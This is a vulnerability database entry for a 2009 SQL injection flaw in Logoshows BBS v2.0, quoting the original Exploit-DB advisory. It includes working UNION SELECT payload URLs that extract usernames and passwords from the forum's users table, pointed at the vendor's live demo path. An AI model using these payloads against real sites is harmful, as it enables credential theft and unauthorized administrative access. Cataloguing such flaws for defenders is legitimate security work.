Logoshows BBS v2.0

vendor:

Logoshows BBS

by:

Ruzgarin_Oglu

CVSS

HIGH

SQL Injection

CWE

Product Name: Logoshows BBS

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:logoshows:logoshows_bbs:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The vulnerability exists due to insufficient filtration of user-supplied input passed via the 'forumid' parameter to '/globepersonnel_forum.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication and gain access to the application with administrative privileges.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

__________________________________________________________________________________________________________________________

# Author                  : Ruzgarin_Oglu

# Script Name           : Logoshows BBS v2.0

# Script Download      : http://www.logoshows.com/download/bbs88.rar

# Vulnerable Type      : Sql Injection

# Demo                    : http://www.logoshows.com/bbs/

# Licence And Pricing  : $1.00 USD

# Special Thanks        : By.Ultr@si(Student lol),Fortyseven,Rawage,Daniel-Koo,Subz3rr0,By.Seyfi,Fero,Septemb0x, ve ismini sayamadÄ±ÄŸÄ±m diÄŸer dostlarÄ±m...

___________________________________________________________________________________________________________________________________

Exploit:

/globepersonnel_forum.asp?forumid=[SQL]



POC:

http://www.victim.com/[path]/globepersonnel_forum.asp?forumid=[SQL]


Example

Username:

http://www.logoshows.com/bbs/globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,15,16,17,18,19+from+users

Password:

http://www.logoshows.com/bbs/globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19+from+users


----Note----

Herkesin bir s*k*lme zamanÄ± vardÄ±r...
Bekleyin beni!

----Note----

# milw0rm.com [2009-08-07]